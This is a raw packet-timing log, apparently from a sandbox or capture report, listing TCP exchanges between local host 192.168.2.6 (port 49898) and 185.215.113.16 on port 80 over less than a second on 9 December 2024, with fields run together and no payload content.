                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.576991081 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.577336073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.577375889 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.577797890 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.577846050 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.578150034 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.578200102 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.578903913 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.578947067 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.579051971 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.579088926 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.579823017 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.579893112 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.579919100 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.579960108 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656147003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656215906 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656478882 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656491041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656527042 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656630039 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656665087 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656824112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.656866074 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.657639027 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.657674074 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.657812119 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.657850981 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.658485889 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.658520937 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.658658981 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.658689976 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.659462929 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.659473896 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.659502983 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.659502983 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.660197973 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.660208941 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.660239935 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.661170959 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.661210060 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.661333084 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.661369085 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.662081003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.662111998 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.662276983 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.662307978 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.662933111 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.662971020 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.663264036 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.663295984 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.663453102 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.663470984 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.663486958 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.663503885 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.664666891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.664704084 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.665039062 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.665080070 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.665349960 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.665384054 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.665543079 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.665582895 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.666207075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.666245937 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.666553020 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.666589022 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.667412996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.667455912 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.667592049 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.667627096 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668212891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668224096 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668256998 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668792009 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668808937 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668822050 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668833017 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668836117 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668850899 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.668879032 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.669354916 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.669367075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.669395924 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.670243025 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.670284033 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.670352936 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.670393944 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.671052933 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.671094894 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.671330929 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.671377897 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.671926022 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.671964884 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.672194004 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.672234058 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.672840118 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.672883034 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.673126936 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.673163891 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.673768044 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.673779964 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.673810959 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.673825026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.674540997 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.674581051 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.674683094 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.674726963 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.675359964 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.675399065 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.675481081 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.675539017 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.676256895 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.676295042 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.676397085 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.676434040 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.677134037 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.677170992 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.677242041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.677278996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.678033113 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.678077936 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.678284883 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.678343058 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.678957939 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.678997040 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.679037094 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.679073095 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.679708004 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.679719925 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.679748058 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.679757118 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.680510998 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.680555105 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.680675030 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.680713892 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.681391001 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.681430101 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.681941032 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.681976080 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.683357000 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.683397055 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.685858011 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.685902119 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686181068 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686192036 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686203003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686213970 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686219931 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686224937 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686234951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686239004 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.686266899 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.687014103 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.687050104 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.687197924 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.687233925 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.688409090 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.688421965 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.688517094 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.688517094 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.688710928 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.688746929 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.689208984 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.689245939 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.689733982 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.689745903 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.689770937 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.689781904 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.690315962 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.690351963 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.690484047 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.690520048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691421032 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691458941 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691797972 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691809893 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691824913 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691838026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691838026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.691854000 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.763855934 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.763927937 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.764173985 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.764183998 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.764215946 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.764226913 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.764349937 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.764389038 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765047073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765058041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765083075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765099049 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765144110 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765360117 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765372038 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765408993 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765419006 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765533924 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.765569925 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.766169071 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.766215086 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.766279936 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.766315937 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.767035961 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.767086029 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.767626047 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.767721891 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768024921 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768037081 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768064976 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768075943 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768836975 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768886089 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768924952 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.768960953 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.769603968 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.769653082 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.769922972 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.769963026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.770484924 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.770528078 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.770893097 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.770970106 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.847573042 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.847637892 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.847892046 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.847903013 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.847917080 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.847932100 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.847959042 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.848959923 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.848999023 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.849422932 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.849443913 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.849455118 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.849462032 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.849478006 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.849499941 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.850459099 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.850470066 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.850497007 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.850507021 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.851382971 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.851393938 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.851423979 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.851433992 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.852051020 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.852096081 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.852138996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.852175951 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.852807999 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.852844954 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.853076935 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.853113890 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.853811979 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.853852034 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.853880882 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.853916883 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.854563951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.854599953 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.854710102 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.854748011 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.855407000 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.855443954 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.856241941 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.856281996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.856318951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.856331110 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.856354952 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.856365919 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.857140064 CET8049898185.215.113.16192.168.2.6
